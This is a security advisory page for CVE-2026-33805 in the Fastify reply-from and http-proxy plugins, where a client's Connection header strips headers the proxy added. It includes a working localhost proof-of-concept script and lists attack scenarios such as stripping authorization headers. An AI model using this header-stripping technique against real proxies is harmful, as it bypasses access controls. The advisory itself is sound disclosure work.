CVE-2026-33805: @fastify/reply-from vulnerable to connection header abuse enabling stripping of proxy-added headers

Published Apr 15, 2026
·
Updated

@fastify/reply-from v12.6.1 and earlier and @fastify/http-proxy v11.4.3 and earlier process the client's Connection header after the proxy has added its own headers via rewriteRequestHeaders. This allows attackers to retroactively strip proxy-added headers from upstream requests by listing them in the Connection header value. Any header added by the proxy for routing, access control, or security purposes can be selectively removed by a client. @fastify/http-proxy is also affected as it delegates to @fastify/reply-from.

Upgrade to @fastify/reply-from v12.6.2 or @fastify/http-proxy v11.4.4 or later.

Other sources

Summary

@fastify/reply-from and @fastify/http-proxy process the client's Connection header after the proxy has added its own headers via rewriteRequestHeaders. This allows attackers to retroactively strip proxy-added headers (like access control or identification headers) from upstream requests by listing them in the Connection header value. This affects applications using these plugins with custom header injection for routing, access control, or security purposes.

Details

The vulnerability exists in @fastify/reply-from/lib/request.js at lines 128-136 (HTTP/1.1 handler) and lines 191-200 (undici handler). The processing flow is:

1. Client headers are copied including the connection header (@fastify/reply-from/index.js line 91) 2. The proxy adds custom headers via rewriteRequestHeaders (line 151) 3. During request construction, the transport handlers read the client's Connection header and strip any headers listed in it 4. This stripping happens after rewriteRequestHeaders, allowing clients to target proxy-added headers for removal

RFC 7230 Section 6.1 Connection header processing is intended for proxies to strip hop-by-hop headers from incoming requests before adding their own headers. The current implementation reverses this order, processing the client's Connection header after the proxy has already modified the header set.

The call chain: 1. @fastify/reply-from/index.js line 91: headers = { ...req.headers } — copies ALL client headers including connection 2. index.js line 151: requestHeaders = rewriteRequestHeaders(this.request, headers) — proxy adds custom headers (e.g., x-forwarded-by) 3. index.js line 180: requestImpl({...headers: requestHeaders...}) — passes headers to transport 4. request.js line 191 (undici): getConnectionHeaders(req.headers) — reads Connection header FROM THE CLIENT 5. request.js lines 198-200: Strips headers listed in Connection — including proxy-added headers

This is distinct from the general hop-by-hop forwarding concern — it's specifically about the client controlling which headers get stripped from the upstream request via the Connection header, subverting the proxy's rewriteRequestHeaders function.

PoC

Self-contained reproduction with an upstream echo service and a proxy that adds a custom header:

javascript const fastify = require('fastify');

async function test() { // Upstream service that echoes headers const upstream = fastify({ logger: false }); upstream.get('/api/echo-headers', async (request) => { return { headers: request.headers }; }); await upstream.listen({ port: 19801 });

// Proxy that adds a custom header via rewriteRequestHeaders const proxy = fastify({ logger: false }); await proxy.register(require('@fastify/reply-from'), { base: 'http://localhost:19801' });

proxy.get('/proxy/', async (request, reply) => { const target = '/' + (request.params[''] || ''); return reply.from(target, { rewriteRequestHeaders: (originalReq, headers) => { return { ...headers, 'x-forwarded-by': 'fastify-proxy' }; } }); });

await proxy.listen({ port: 19800 });

// Baseline: proxy adds x-forwarded-by header const res1 = await proxy.inject({ method: 'GET', url: '/proxy/api/echo-headers' }); console.log('Baseline response headers from upstream:'); const body1 = JSON.parse(res1.body); console.log(' x-forwarded-by:', body1.headers['x-forwarded-by'] || 'NOT PRESENT');

// Attack: Connection header strips the proxy-added header const res2 = await proxy.inject({ method: 'GET', url: '/proxy/api/echo-headers', headers: { 'connection': 'x-forwarded-by' } }); console.log('\nAttack response headers from upstream:'); const body2 = JSON.parse(res2.body); console.log(' x-forwarded-by:', body2.headers['x-forwarded-by'] || 'NOT PRESENT (stripped!)');

await proxy.close(); await upstream.close(); } test();

Actual output: Baseline response headers from upstream: x-forwarded-by: fastify-proxy

Attack response headers from upstream: x-forwarded-by: NOT PRESENT (stripped!)

The x-forwarded-by header that the proxy explicitly added in rewriteRequestHeaders is stripped before reaching the upstream.

Multiple headers can be stripped at once by sending Connection: x-forwarded-by, x-forwarded-for.

Both the undici (default) and HTTP/1.1 transport handlers in @fastify/reply-from are affected, as well as @fastify/http-proxy which delegates to @fastify/reply-from.

Impact

Attackers can selectively remove any header added by the proxy's rewriteRequestHeaders function. This enables several attack scenarios:

1. Bypass proxy identification: Strip headers that identify requests as coming through the proxy, potentially bypassing upstream controls that differentiate between direct and proxied requests 2. Circumvent access control: If the proxy adds headers used for routing, authorization, or security decisions (e.g., x-internal-auth, x-proxy-token), attackers can strip them to access unauthorized resources 3. Remove arbitrary headers: Any header can be targeted, including Connection: authorization to strip authentication or Connection: x-forwarded-for, x-forwarded-by to remove multiple headers at once

This vulnerability affects deployments where the proxy adds security-relevant headers that downstream services rely on for access control decisions. It undermines the security model where proxies act as trusted intermediaries adding authentication or routing signals.

Affected Versions

- @fastify/reply-from — All versions, both undici (default) and HTTP/1.1 transport handlers - @fastify/http-proxy — All versions (delegates to @fastify/reply-from) - Any configuration using rewriteRequestHeaders to add headers that could be security-relevant - No special configuration required to exploit — works with default settings

Suggested Fix

The Connection header from the client should be processed and consumed before rewriteRequestHeaders is called, not after. Alternatively, the Connection header processing in request.js should maintain a list of headers that existed in the original client request and only strip those, not headers added by rewriteRequestHeaders.

GitHub

Affected Software

6 affected componentsFixes available
npm/@fastify/reply-from<=12.6.1
npm/@fastify/http-proxy<=11.4.3
npm/@fastify/http-proxy<=11.4.3
11.4.4
npm/@fastify/reply-from<=12.6.1
12.6.2
fastify Fastify\/http-proxy Node.js<11.4.4
fastify Reply-from Node.js<12.6.2

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade npm/@fastify/http-proxy to a version that resolves this vulnerability.

    Fixed in 11.4.4
  2. Upgrade

    Upgrade npm/@fastify/reply-from to a version that resolves this vulnerability.

    Fixed in 12.6.2
  3. Upgrade

    Upgrade @fastify/reply-from to a version that resolves this vulnerability.

    Fixed in 12.6.2
  4. Upgrade

    Upgrade @fastify/http-proxy to a version that resolves this vulnerability.

    Fixed in 11.4.4

Event History

Apr 15, 2026
CVE Published
via MITRE·10:13 AM
Data Sourced
via MITRE·10:13 AM
DescriptionWeakness
Data Sourced
via Red Hat·11:01 AM
DescriptionSeverityAffected Software
Data Sourced
via NVD·11:16 AM
DescriptionSeverityWeakness
Data Sourced
via NVD·11:16 AM
Affected Software
Apr 16, 2026
Advisory Published
via GitHub·01:02 AM
Data Sourced
via GitHub·01:02 AM
DescriptionWeaknessAffected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-33805?

CVE-2026-33805 is classified as a high severity vulnerability due to its potential to allow attackers to manipulate proxy-added headers.

2

How do I fix CVE-2026-33805?

To fix CVE-2026-33805, upgrade @fastify/reply-from to version 12.6.2 or later and @fastify/http-proxy to version 11.4.4 or later.

3

What are the consequences of CVE-2026-33805?

The consequences of CVE-2026-33805 include unauthorized access to sensitive data through manipulated headers.

4

Which versions are affected by CVE-2026-33805?

CVE-2026-33805 affects @fastify/reply-from versions up to 12.6.1 and @fastify/http-proxy versions up to 11.4.3.

5

Can CVE-2026-33805 impact application security?

Yes, CVE-2026-33805 can significantly impact application security by enabling header manipulation and data exposure.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203